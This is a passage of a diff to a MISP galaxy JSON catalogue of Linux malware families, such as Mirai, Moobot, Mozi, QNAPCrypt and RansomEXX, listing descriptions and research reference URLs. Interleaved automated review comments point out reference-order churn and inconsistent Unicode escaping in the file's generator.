"https://deform.co/the-infamous-mirai-trojan-evolves-new-pandora-variant-targets-android-tvs/", + "https://www.stratosphereips.org/blog/2019/4/12/analysis-of-a-irc-based-botnet", + "https://www.radware.com/getmedia/18d24c2d-c092-4a61-9ad6-ebb92b7a49b8/Alert_Realtek_SDK.aspx", + "https://krebsonsecurity.com/2017/12/mirai-iot-botnet-co-authors-plead-guilty/", + "https://blog.reversinglabs.com/blog/mirai-botnet-continues-to-plague-iot-space", + "https://www.netscout.com/blog/asert/ddos-attack-campaign-targeting-multiple-organizations-ukraine", + "https://unit42.paloaltonetworks.com/unit42-multi-exploit-iotlinux-botnets-mirai-gafgyt-target-apache-struts-sonicwall/", + "https://unit42.paloaltonetworks.com/hoaxcalls-mirai-target-legacy-symantec-web-gateways/", + "https://unit42.paloaltonetworks.com/cve-2021-32305-websvn/", + 
"https://blog.trendmicro.com/trendlabs-security-intelligence/with-mirai-comes-miori-iot-botnet-delivered-via-thinkphp-remote-code-execution-exploit/", + "https://www.politie.nl/nieuws/2019/oktober/2/11-servers-botnet-offline.html", + "https://blog.netlab.360.com/some_details_of_the_ddos_attacks_targeting_ukraine_and_russia_in_recent_days/", + "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/tough-times-for-ukrainian-honeypot", + "https://forensicitguy.github.io/extracting-indicators-from-packed-mirai/", + "https://cert.gov.ua/article/37139", + "https://www.cisecurity.org/insights/blog/top-10-malware-march-2022", + "https://blog.netlab.360.com/mirai_ptea-botnet-is-exploiting-undisclosed-kguard-dvr-vulnerability-en/", + "https://www.tesorion.nl/en/resources/pdfstore/Report-OSINT-Russia-Ukraine-Conflict-Cyberaspect.pdf", + "https://cujo.com/mirai-gafgyt-with-new-ddos-modules-discovered/", + "https://www.zscaler.com/blogs/security-research/threatlabz-analysis-log4shell-cve-2021-44228-exploit-attempts", + "https://prod-blog.avira.com/katana-a-new-variant-of-the-mirai-botnet", + "https://thehackernews.com/2022/04/hackers-exploiting-spring4shell.html", + "https://synthesis.to/2021/06/30/automating_string_decryption.html", + "https://blogs.jpcert.or.jp/en/2022/03/anti_upx_unpack.html", + "https://www.cadosecurity.com/analysis-of-initial-in-the-wild-attacks-exploiting-log4shell-log4j-cve-2021-44228/" ], "synonyms": [ "Katana" 
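Review bot: Almost every line of the Mirai `refs` array is marked changed although the hunk only grows from 66 to 73 entries; as far as I can match the `-` and `+` lines, nothing was removed and the seven genuinely new URLs (Mukashi, CVE-2020-17496, the enterprise wireless display variant, CVE-2022-22954, Echobot, the Pandora Android TV write-up, the Struts/SonicWall multi-exploit post) are buried among some sixty lines that merely moved. The reordering looks like the generator emits references in a non-deterministic order, presumably straight from an unordered source structure. For a cluster that downstream MISP instances ingest as threat intelligence, that matters: a reviewer cannot reasonably confirm that no reference was dropped or a wrong URL slipped in when the whole array is rewritten on every sync. I would have the generator sort `refs` (or preserve the upstream order) so diffs show only real changes; the same churn pattern appears in the Moobot, Mozi, Owari and Penquin Turla hunks in this patch.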
@@ -5610,15 +5828,28 @@ "uuid": "aaf8ce1b-3117-47c6-b756-809538ac8ff2", "value": "Momentum" }, + { + "description": "A ransomware, derived from the leaked Conti source code.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/elf.monti", + "https://www.trendmicro.com/en_us/research/23/h/monti-ransomware-unleashes-a-new-encryptor-for-linux.html" + ], + "synonyms": [], + "type": [] + }, + "uuid": "7df77b77-00dd-4eba-a697-b9a7be262acc", + "value": "Monti" + }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.moobot", "https://blog.netlab.360.com/some_details_of_the_ddos_attacks_targeting_ukraine_and_russia_in_recent_days/", - "https://unit42.paloaltonetworks.com/moobot-d-link-devices/", - "https://otx.alienvault.com/pulse/6075b645942d5adf9bb8949b", "https://blog.netlab.360.com/ddos-botnet-moobot-en/", + "https://otx.alienvault.com/pulse/6075b645942d5adf9bb8949b", + "https://unit42.paloaltonetworks.com/moobot-d-link-devices/", "https://blog.netlab.360.com/moobot-0day-unixcctv-dvr-en/", "https://www.fortinet.com/blog/threat-research/mirai-based-botnet-moobot-targets-hikvision-vulnerability" ], @@ -5635,8 +5866,8 @@ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.moose", "http://www.welivesecurity.com/2016/11/02/linuxmoose-still-breathing/", "http://www.welivesecurity.com/2015/05/26/moose-router-worm/", - "https://www.virusbulletin.com/uploads/pdf/magazine/2018/VB2018-Paquet-Clouston.pdf", - "http://gosecure.net/2016/11/02/exposing-the-ego-market-the-cybercrime-performed-by-the-linux-moose-botnet/" + "http://gosecure.net/2016/11/02/exposing-the-ego-market-the-cybercrime-performed-by-the-linux-moose-botnet/", + "https://www.virusbulletin.com/uploads/pdf/magazine/2018/VB2018-Paquet-Clouston.pdf" ], "synonyms": [], "type": [] 
@@ -5649,17 +5880,18 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.mozi", - "https://www.microsoft.com/security/blog/2021/08/19/how-to-proactively-defend-against-mozi-iot-botnet/", - "https://www.crowdstrike.com/blog/linux-targeted-malware-increased-by-35-percent-in-2021/", - "https://cujo.com/upx-anti-unpacking-techniques-in-iot-malware/", + "https://www.nozominetworks.com/blog/how-iot-botnets-evade-detection-and-analysis/", "https://www.nozominetworks.com/blog/overcoming-the-challenges-of-detecting-p2p-botnets-on-your-network/", - "https://blog.netlab.360.com/mozi-another-botnet-using-dht/", + "https://www.crowdstrike.com/blog/linux-targeted-malware-increased-by-35-percent-in-2021/", + "https://www.elastic.co/blog/collecting-and-operationalizing-threat-data-from-the-mozi-botnet", "https://www.youtube.com/watch?v=cDFO_MRlg3M", - "https://blog.centurylink.com/new-mozi-malware-family-quietly-amasses-iot-bots/", + "https://blog.netlab.360.com/p2p-botnets-review-status-continuous-monitoring/", "https://go.recordedfuture.com/hubfs/reports/cta-2021-1112.pdf", "https://blog.netlab.360.com/the-mostly-dead-mozi-and-its-lingering-bots/", - "https://www.nozominetworks.com/blog/how-iot-botnets-evade-detection-and-analysis/", - "https://www.elastic.co/blog/collecting-and-operationalizing-threat-data-from-the-mozi-botnet" + "https://cujo.com/upx-anti-unpacking-techniques-in-iot-malware/", + "https://blog.netlab.360.com/mozi-another-botnet-using-dht/", + "https://blog.centurylink.com/new-mozi-malware-family-quietly-amasses-iot-bots/", + "https://www.microsoft.com/security/blog/2021/08/19/how-to-proactively-defend-against-mozi-iot-botnet/" ], "synonyms": [], "type": [] 
@@ -5672,10 +5904,16 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.mrblack", + "https://www.bleepingcomputer.com/news/security/exposed-docker-apis-abused-by-ddos-cryptojacking-botnet-malware/", + "https://news.drweb.com/?i=5760&c=23&lng=en", "https://www.botconf.eu/wp-content/uploads/2015/12/OK-P13-Liu-Ya-Automatically-Classify-Unknown-Bots-by-The-Register-Messages.pdf", - "https://news.drweb.com/?i=5760&c=23&lng=en" + "https://blog.syscall.party/post/aes-ddos-analysis-part-1/", + "https://www.virusbulletin.com/uploads/pdf/conference/vb2015/KalnaiHorejsi-VB2015.pdf" + ], + "synonyms": [ + "AESDDoS", + "Dofloo" ], - "synonyms": [], "type": [] }, "uuid": "fc047e32-9cf2-4a92-861a-be882efd8a50", @@ -5712,8 +5950,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.ngioweb", - "https://blog.netlab.360.com/an-analysis-of-linux-ngioweb-botnet-en/", "https://twitter.com/IntezerLabs/status/1324346324683206657", + "https://blog.netlab.360.com/an-analysis-of-linux-ngioweb-botnet-en/", "https://blog.netlab.360.com/linux-ngioweb-v2-going-after-iot-devices-en/" ], "synonyms": [], @@ -5722,6 +5960,19 @@ "uuid": "a4ad242c-6fd0-4b1d-8d97-8f48150bf242", "value": "Ngioweb (ELF)" }, + { + "description": "According to the author, Nimbo-C2 is yet another (simple and lightweight) C2 framework. The agent currently supports Windows x64 and Linux. It's written in Nim, with some usage of .NET (by dynamically loading the CLR to the process).", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/elf.nimbo_c2", + "https://github.com/itaymigdal/Nimbo-C2" + ], + "synonyms": [], + "type": [] + }, + "uuid": "5dbdf2ea-a15b-4ad6-bf7a-a030998c66b4", + "value": "Nimbo-C2 (ELF)" + }, { "description": "Golang-based RAT that offers execution of shell commands and download+run capability. ", "meta": { 
@@ -5741,14 +5992,14 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.notrobin", - "https://www.intezer.com/blog/cloud-security/top-linux-cloud-threats-of-2020/", - "https://www.fireeye.com/blog/products-and-services/2020/01/rough-patch-promise-it-will-be-200-ok.html", - "https://www.fireeye.com/blog/threat-research/2020/01/vigilante-deploying-mitigation-for-citrix-netscaler-vulnerability-while-maintaining-backdoor.html", - "https://dcso.de/2020/01/16/a-curious-case-of-cve-2019-19781-palware-remove_bds/", + "https://news.sophos.com/en-us/2020/05/21/asnarok2/", "https://blog.dcso.de/a-curious-case-of-cve-2019-19781-palware-remove_bds/", - "https://intezer.com/blog/linux/elf-malware-analysis-101-linux-threats-no-longer-an-afterthought", "https://www.theregister.co.uk/2020/01/17/hackers_patch_citrix_vulnerability/", - "https://news.sophos.com/en-us/2020/05/21/asnarok2/" + "https://www.fireeye.com/blog/threat-research/2020/01/vigilante-deploying-mitigation-for-citrix-netscaler-vulnerability-while-maintaining-backdoor.html", + "https://www.intezer.com/blog/cloud-security/top-linux-cloud-threats-of-2020/", + "https://dcso.de/2020/01/16/a-curious-case-of-cve-2019-19781-palware-remove_bds/", + "https://www.fireeye.com/blog/products-and-services/2020/01/rough-patch-promise-it-will-be-200-ok.html", + "https://intezer.com/blog/linux/elf-malware-analysis-101-linux-threats-no-longer-an-afterthought" ], "synonyms": [ "remove_bds" @@ -5759,7 +6010,7 @@ "value": "NOTROBIN" }, { - "description": "", + "description": "According to stormshield, Orbit is a two-stage malware that appeared in July 2022, discovered by Intezer lab. Acting as a stealer and backdoor on 64-bit Linux systems, it consists of an executable acting as a dropper and a dynamic library.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.orbit", 
@@ -5776,13 +6027,13 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.owari", - "https://twitter.com/ankit_anubhav/status/1019647993547550720", - "https://twitter.com/hrbrmstr/status/1019922651203227653", - "https://blog.newskysecurity.com/understanding-the-iot-hacker-a-conversation-with-owari-sora-iot-botnet-author-117feff56863", - "https://twitter.com/360Netlab/status/1019759516789821441", + "https://www.bleepingcomputer.com/news/security/router-crapfest-malware-author-builds-18-000-strong-botnet-in-a-day/", "https://www.fortinet.com/blog/threat-research/a-wicked-family-of-bots.html", - "https://www.scmagazine.com/malware-author-anarchy-builds-18000-strong-huawei-router-botnet/article/782395/", - "https://www.bleepingcomputer.com/news/security/router-crapfest-malware-author-builds-18-000-strong-botnet-in-a-day/" + "https://twitter.com/ankit_anubhav/status/1019647993547550720", + "https://blog.newskysecurity.com/understanding-the-iot-hacker-a-conversation-with-owari-sora-iot-botnet-author-117feff56863", + "https://twitter.com/hrbrmstr/status/1019922651203227653", + "https://twitter.com/360Netlab/status/1019759516789821441", + "https://www.scmagazine.com/malware-author-anarchy-builds-18000-strong-huawei-router-botnet/article/782395/" ], "synonyms": [], "type": [] 
@@ -5821,18 +6072,19 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.penquin_turla", - "https://www.blackberry.com/us/en/pdfviewer?file=/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-bb-decade-of-the-rats.pdf", "https://securelist.com/big-threats-using-code-similarity-part-1/97239/", - "https://securelist.com/apt-trends-report-q2-2020/97937/", - "https://twitter.com/juanandres_gs/status/944741575837528064", + "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/07180251/Penquins_Moonlit_Maze_PDF_eng.pdf", "https://www.leonardo.com/documents/20142/10868623/Malware+Technical+Insight+_Turla+%E2%80%9CPenquin_x64%E2%80%9D.pdf", - "https://lab52.io/blog/looking-for-penquins-in-the-wild/", - "https://www.leonardocompany.com/documents/20142/10868623/Malware+Technical+Insight+_Turla+%E2%80%9CPenquin_x64%E2%80%9D.pdf", "https://securelist.com/files/2017/04/Penquins_Moonlit_Maze_PDF_eng.pdf", - "https://www.youtube.com/watch?v=JXsjRUxx47E", - "https://securelist.com/an-overview-of-targeted-attacks-and-apts-on-linux/98440/", + "https://twitter.com/juanandres_gs/status/944741575837528064", + "https://securelist.com/files/2017/04/Penquins_Moonlit_Maze_AppendixB.pdf", "https://www.intezer.com/blog/cloud-security/top-linux-cloud-threats-of-2020/", - "https://securelist.com/files/2017/04/Penquins_Moonlit_Maze_AppendixB.pdf" + "https://www.leonardocompany.com/documents/20142/10868623/Malware+Technical+Insight+_Turla+%E2%80%9CPenquin_x64%E2%80%9D.pdf", + "https://securelist.com/an-overview-of-targeted-attacks-and-apts-on-linux/98440/", + "https://www.blackberry.com/us/en/pdfviewer?file=/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-bb-decade-of-the-rats.pdf", + "https://securelist.com/apt-trends-report-q2-2020/97937/", + "https://lab52.io/blog/looking-for-penquins-in-the-wild/", + "https://www.youtube.com/watch?v=JXsjRUxx47E" ], "synonyms": [], "type": [] 
@@ -5847,16 +6099,19 @@ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.perlbot", "https://blog.netlab.360.com/some_details_of_the_ddos_attacks_targeting_ukraine_and_russia_in_recent_days/", "https://documents.trendmicro.com/assets/Perl-Based_Shellbot_Looks_to_Target_Organizations_via_C&C_appendix.pdf", + "https://unit42.paloaltonetworks.com/cve-2022-22954-vmware-vulnerabilities/", "https://twitter.com/Nocturnus/status/1308430959512092673", - "https://www.trendmicro.com/en_us/research/20/l/teamtnt-now-deploying-ddos-capable-irc-bot-tntbotinger.html", - "https://therecord.media/agents-raid-home-of-kansas-man-seeking-info-on-botnet-that-infected-dod-network/", - "https://yoroi.company/research/outlaw-is-back-a-new-crypto-botnet-targets-european-organizations/", "https://brianstadnicki.github.io/posts/malware-gitlab-perlbot/", + "https://yoroi.company/research/outlaw-is-back-a-new-crypto-botnet-targets-european-organizations/", "https://unit42.paloaltonetworks.com/los-zetas-from-eleethub-botnet/", - "https://us-cert.cisa.gov/ncas/alerts/aa20-345a", - "https://sysdig.com/blog/malware-analysis-shellbot-sysdig/", + "https://asec.ahnlab.com/en/54647/", "https://jask.com/wp-content/uploads/2019/02/Shellbot-Campaign_v2.pdf", - "https://asec.ahnlab.com/en/49769/" + "https://therecord.media/agents-raid-home-of-kansas-man-seeking-info-on-botnet-that-infected-dod-network/", + "https://sysdig.com/blog/malware-analysis-shellbot-sysdig/", + "https://unit42.paloaltonetworks.com/cve-2020-17496/", + "https://us-cert.cisa.gov/ncas/alerts/aa20-345a", + "https://asec.ahnlab.com/en/49769/", + "https://www.trendmicro.com/en_us/research/20/l/teamtnt-now-deploying-ddos-capable-irc-bot-tntbotinger.html" ], "synonyms": [ "DDoS Perl IrcBot", 
@@ -5885,7 +6140,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.pingpull", - "https://unit42.paloaltonetworks.com/alloy-taurus/" + "https://unit42.paloaltonetworks.com/alloy-taurus/", + "https://blog.sekoia.io/my-teas-not-cold-an-overview-of-china-cyber-threat/" ], "synonyms": [], "type": [] @@ -5898,7 +6154,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.pink", - "https://blog.netlab.360.com/pink-en/" + "https://blog.netlab.360.com/pink-en/", + "https://blog.netlab.360.com/p2p-botnets-review-status-continuous-monitoring/" ], "synonyms": [], "type": [] @@ -5911,14 +6168,14 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.plead", - "https://www.macnica.net/file/mpressioncss_ta_report_2019_2_nopw.pdf", - "https://www.ironnet.com/blog/china-cyber-attacks-the-current-threat-landscape", "https://cyberandramen.net/2021/02/11/blacktech-updates-elf-plead-backdoor/", + "https://jp.security.ntt/resources/EN-BlackTech_2021.pdf", + "https://www.ironnet.com/blog/china-cyber-attacks-the-current-threat-landscape", "https://blogs.jpcert.or.jp/en/2020/11/elf-plead.html", + "https://www.intezer.com/blog/cloud-security/top-linux-cloud-threats-of-2020/", "https://www.vmware.com/content/dam/digitalmarketing/vmware/en/pdf/docs/vmw-exposing-malware-in-linux-based-multi-cloud-environments.pdf", "https://www.cyberandramen.net/home/blacktech-doesnt-miss-a-step-a-quick-analysis-of-a-busy-2020", - "https://www.intezer.com/blog/cloud-security/top-linux-cloud-threats-of-2020/", - "https://jp.security.ntt/resources/EN-BlackTech_2021.pdf" + "https://www.macnica.net/file/mpressioncss_ta_report_2019_2_nopw.pdf" ], "synonyms": [], "type": [] 
@@ -5959,13 +6216,13 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.prometei", - "https://www.trendmicro.com/en_us/research/21/e/proxylogon-a-coinminer--a-ransomware--and-a-botnet-join-the-part.html", - "https://twitter.com/IntezerLabs/status/1338480158249013250", "https://blog.talosintelligence.com/2020/07/prometei-botnet-and-its-quest-for-monero.html", "https://cujo.com/iot-malware-journals-prometei-linux/", - "https://blog.talosintelligence.com/2020/12/2020-year-in-malware.html", + "https://twitter.com/IntezerLabs/status/1338480158249013250", + "https://www.trendmicro.com/en_us/research/21/e/proxylogon-a-coinminer--a-ransomware--and-a-botnet-join-the-part.html", + "https://www.intezer.com/blog/cloud-security/top-linux-cloud-threats-of-2020/", "https://www.cybereason.com/blog/prometei-botnet-exploiting-microsoft-exchange-vulnerabilities", - "https://www.intezer.com/blog/cloud-security/top-linux-cloud-threats-of-2020/" + "https://blog.talosintelligence.com/2020/12/2020-year-in-malware.html" ], "synonyms": [], "type": [] @@ -5978,8 +6235,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.pro_ocean", - "https://seguranca-informatica.pt/new-cryptojacking-malware-called-pro-ocean-is-now-attacking-apache-oracle-and-redis-servers/", - "https://unit42.paloaltonetworks.com/pro-ocean-rocke-groups-new-cryptojacking-malware/" + "https://unit42.paloaltonetworks.com/pro-ocean-rocke-groups-new-cryptojacking-malware/", + "https://seguranca-informatica.pt/new-cryptojacking-malware-called-pro-ocean-is-now-attacking-apache-oracle-and-redis-servers/" ], "synonyms": [], "type": [] 
@@ -6002,22 +6259,22 @@ "value": "pupy (ELF)" }, { - "description": "The QNAPCrypt ransomware works similarly to other ransomware, including encrypting all files and delivering a ransom note. However, there are several important differences:\r\n\r\n1. The ransom note was included solely as a text file, without any message on the screen—naturally, because it is a server and not an endpoint.\r\n\r\n2. Every victim is provided with a different, unique Bitcoin wallet—this could help the attackers avoid being traced.\r\n\r\n3. Once a victim is compromised, the malware requests a wallet address and a public RSA key from the command and control server (C&C) before file encryption.", + "description": "The QNAPCrypt ransomware works similarly to other ransomware, including encrypting all files and delivering a ransom note. However, there are several important differences:\r\n\r\n1. The ransom note was included solely as a text file, without any message on the screen\u2014naturally, because it is a server and not an endpoint.\r\n\r\n2. Every victim is provided with a different, unique Bitcoin wallet\u2014this could help the attackers avoid being traced.\r\n\r\n3. 
Once a victim is compromised, the malware requests a wallet address and a public RSA key from the command and control server (C&C) before file encryption.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.qnapcrypt", + "https://unit42.paloaltonetworks.com/ech0raix-ransomware-soho/", + "https://www.qnap.com/en/security-advisory/QSA-20-02", + "https://www.intezer.com/blog-russian-cybercrime-group-fullofdeep-behind-qnapcrypt-ransomware-campaigns/", + "https://www.bleepingcomputer.com/news/security/qnap-warns-of-ech0raix-ransomware-attacks-roon-server-zero-day/", + "https://blog.netlab.360.com/qnap-nas-users-make-sure-you-check-your-system/", "https://www.intezer.com/blog-seizing-15-active-ransomware-campaigns-targeting-linux-file-storage-servers/", "https://www.vmware.com/content/dam/digitalmarketing/vmware/en/pdf/docs/vmw-exposing-malware-in-linux-based-multi-cloud-environments.pdf", "https://www.anomali.com/blog/the-ech0raix-ransomware", - "https://blog.netlab.360.com/qnap-nas-users-make-sure-you-check-your-system/", - "https://www.intezer.com/blog/malware-analysis/when-viruses-mutate-did-suncrypt-ransomware-evolve-from-qnapcrypt", - "https://intezer.com/blog/linux/elf-malware-analysis-101-linux-threats-no-longer-an-afterthought", - "https://www.bleepingcomputer.com/news/security/qnap-warns-of-ech0raix-ransomware-attacks-roon-server-zero-day/", - "https://www.qnap.com/en/security-advisory/QSA-20-02", "https://www.ibm.com/downloads/cas/Z81AVOY7", - "https://www.intezer.com/blog-russian-cybercrime-group-fullofdeep-behind-qnapcrypt-ransomware-campaigns/", "https://documents.trendmicro.com/assets/pdf/wp-backing-your-backup-defending-nas-devices-against-evolving-threats.pdf", - "https://unit42.paloaltonetworks.com/ech0raix-ransomware-soho/" + "https://www.intezer.com/blog/malware-analysis/when-viruses-mutate-did-suncrypt-ransomware-evolve-from-qnapcrypt", + 
"https://intezer.com/blog/linux/elf-malware-analysis-101-linux-threats-no-longer-an-afterthought" ], "synonyms": [ "eCh0raix" @@ -6032,11 +6289,11 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.qsnatch", - "https://www.trendmicro.com/en_us/research/21/l/the-evolution-of-iot-linux-malware-based-on-mitre-att&ck-ttps.html", - "https://www.kyberturvallisuuskeskus.fi/en/news/qsnatch-malware-designed-qnap-nas-devices", - "https://us-cert.cisa.gov/ncas/alerts/aa20-209a", - "https://www.ncsc.gov.uk/files/NCSC%20CISA%20Alert%20-QNAP%20NAS%20Devices.pdf", "https://bin.re/blog/the-dga-of-qsnatch/", + "https://www.ncsc.gov.uk/files/NCSC%20CISA%20Alert%20-QNAP%20NAS%20Devices.pdf", + "https://us-cert.cisa.gov/ncas/alerts/aa20-209a", + "https://www.kyberturvallisuuskeskus.fi/en/news/qsnatch-malware-designed-qnap-nas-devices", + "https://www.trendmicro.com/en_us/research/21/l/the-evolution-of-iot-linux-malware-based-on-mitre-att&ck-ttps.html", "https://documents.trendmicro.com/assets/pdf/wp-backing-your-backup-defending-nas-devices-against-evolving-threats.pdf" ], "synonyms": [], @@ -6077,9 +6334,9 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.ragnarlocker", + "https://twitter.com/malwrhunterteam/status/1475568201673105409", "https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/analysis-and-protections-for-ragnarlocker-ransomware.html", - "https://noticeofpleadings.com/crackedcobaltstrike/files/ComplaintAndSummons/1%20-Microsoft%20Cobalt%20Strike%20-%20Complaint(907040021.9).pdf", - "https://twitter.com/malwrhunterteam/status/1475568201673105409" + "https://noticeofpleadings.com/crackedcobaltstrike/files/ComplaintAndSummons/1%20-Microsoft%20Cobalt%20Strike%20-%20Complaint(907040021.9).pdf" ], "synonyms": [], "type": [] 
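Review bot: The only change to the QNAPCrypt `description` is that the literal em-dashes are re-emitted as `\u2014` escapes (the Rekoobe and Sustes entries below get the same `\u2019` treatment), which is an encoder-setting change, presumably `ensure_ascii` defaulting to true in the generator, not a content change. Both forms decode to the same string, but flipping between raw UTF-8 and `\uXXXX` across runs rewrites every non-ASCII description and will likely be flipped back by the repository's normalisation pass if that emits raw UTF-8. Pick one convention in the generator so this does not churn. The `refs` on this entry are, as far as I can see, a pure reorder: every added line (Unit 42, QSA-20-02, Intezer, BleepingComputer, netlab) was already present on the old side.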
@@ -6092,8 +6349,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.rakos", - "https://journal.cecyf.fr/ojs/index.php/cybin/article/view/16/22", - "http://www.welivesecurity.com/2016/12/20/new-linuxrakos-threat-devices-servers-ssh-scan/" + "http://www.welivesecurity.com/2016/12/20/new-linuxrakos-threat-devices-servers-ssh-scan/", + "https://journal.cecyf.fr/ojs/index.php/cybin/article/view/16/22" ], "synonyms": [], "type": [] 
@@ -6102,28 +6359,29 @@ "value": "Rakos" }, { - "description": "", + "description": "According to SentineOne, RansomEXX (aka Defray, Defray777), a multi-pronged extortion threat, has been observed in the wild since late 2020. RansomEXX is associated with attacks against the Texas Department of Transportation, Groupe Atlantic, and several other large enterprises. There are Windows and Linux variants of this malware family, and they are known for their limited and exclusive targeting.\r\n\r\n", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.ransomexx", - "https://docs.google.com/spreadsheets/d/1MI8Z2tBhmqQ5X8Wf_ozv3dVjz5sJOs-3", - "https://krebsonsecurity.com/2021/08/ransomware-gangs-and-the-name-game-distraction/", - "https://www.bleepingcomputer.com/news/security/ecuadors-state-run-cnt-telco-hit-by-ransomexx-ransomware/", - "https://www.crowdstrike.com/blog/carbon-spider-sprite-spider-target-esxi-servers-with-ransomware/", - "https://www.intezer.com/blog/cloud-security/top-linux-cloud-threats-of-2020/", - "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf", - "https://www.ctir.gov.br/arquivos/alertas/2020/alerta_2020_03_ataques_de_ransomware.pdf", - "https://www.paloaltonetworks.com/content/dam/pan/en_US/assets/pdf/reports/Unit_42/unit42-ransomware-threat-report-2021.pdf", - "https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf", "https://www.ic3.gov/Media/News/2021/211101.pdf", - "https://securelist.com/ransomexx-trojan-attacks-linux-systems/99279/", "https://www.vmware.com/content/dam/digitalmarketing/vmware/en/pdf/docs/vmw-exposing-malware-in-linux-based-multi-cloud-environments.pdf", - "https://gustavopalazolo.medium.com/ransomexx-an%C3%A1lise-do-ransomware-utilizado-no-ataque-ao-stj-918001ec8195", - "https://www.cybereason.com/blog/cybereason-vs.-ransomexx-ransomware", - 
"https://blogs.vmware.com/security/2022/09/esxi-targeting-ransomware-the-threats-that-are-after-your-virtual-machines-part-1.html", - "https://www.crowdstrike.com/blog/carbon-spider-sprite-spider-target-esxi-servers-with-ransomware/?utm_campaign=blog&utm_medium=soc&utm_source=twtr&utm_content=sprout", "https://www.youtube.com/watch?v=qxPXxWMI2i4", - "https://web.archive.org/web/20210305181115/https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf" + "https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf", + "https://www.crowdstrike.com/blog/carbon-spider-sprite-spider-target-esxi-servers-with-ransomware/?utm_campaign=blog&utm_medium=soc&utm_source=twtr&utm_content=sprout", + "https://blogs.vmware.com/security/2022/09/esxi-targeting-ransomware-the-threats-that-are-after-your-virtual-machines-part-1.html", + "https://web.archive.org/web/20210305181115/https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf", + "https://krebsonsecurity.com/2021/08/ransomware-gangs-and-the-name-game-distraction/", + "https://www.intezer.com/blog/cloud-security/top-linux-cloud-threats-of-2020/", + "https://docs.google.com/spreadsheets/d/1MI8Z2tBhmqQ5X8Wf_ozv3dVjz5sJOs-3", + "https://www.bleepingcomputer.com/news/security/ecuadors-state-run-cnt-telco-hit-by-ransomexx-ransomware/", + "https://gustavopalazolo.medium.com/ransomexx-an%C3%A1lise-do-ransomware-utilizado-no-ataque-ao-stj-918001ec8195", + "https://www.crowdstrike.com/blog/carbon-spider-sprite-spider-target-esxi-servers-with-ransomware/", + "https://www.paloaltonetworks.com/content/dam/pan/en_US/assets/pdf/reports/Unit_42/unit42-ransomware-threat-report-2021.pdf", + "https://www.sentinelone.com/anthology/ransomexx/", + 
"https://www.ctir.gov.br/arquivos/alertas/2020/alerta_2020_03_ataques_de_ransomware.pdf", + "https://securelist.com/ransomexx-trojan-attacks-linux-systems/99279/", + "https://www.cybereason.com/blog/cybereason-vs.-ransomexx-ransomware", + "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf" ], "synonyms": [ "Defray777" @@ -6139,8 +6397,8 @@ "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.rapper_bot", "https://socradar.io/linux-malware-rapperbot-brute-forcing-ssh-servers/", - "https://www.fortinet.com/blog/threat-research/new-rapperbot-campaign-ddos-attacks", - "https://www.fortinet.com/blog/threat-research/rapperbot-malware-discovery" + "https://www.fortinet.com/blog/threat-research/rapperbot-malware-discovery", + "https://www.fortinet.com/blog/threat-research/new-rapperbot-campaign-ddos-attacks" ], "synonyms": [], "type": [] @@ -6205,9 +6463,9 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.red_alert", - "https://blog.cyble.com/2022/07/12/new-ransomware-groups-on-the-rise/", + "https://blogs.vmware.com/security/2022/09/esxi-targeting-ransomware-the-threats-that-are-after-your-virtual-machines-part-1.html", "https://www.bleepingcomputer.com/news/security/new-redalert-ransomware-targets-windows-linux-vmware-esxi-servers/", - "https://blogs.vmware.com/security/2022/09/esxi-targeting-ransomware-the-threats-that-are-after-your-virtual-machines-part-1.html" + "https://blog.cyble.com/2022/07/12/new-ransomware-groups-on-the-rise/" ], "synonyms": [ "N13V" 
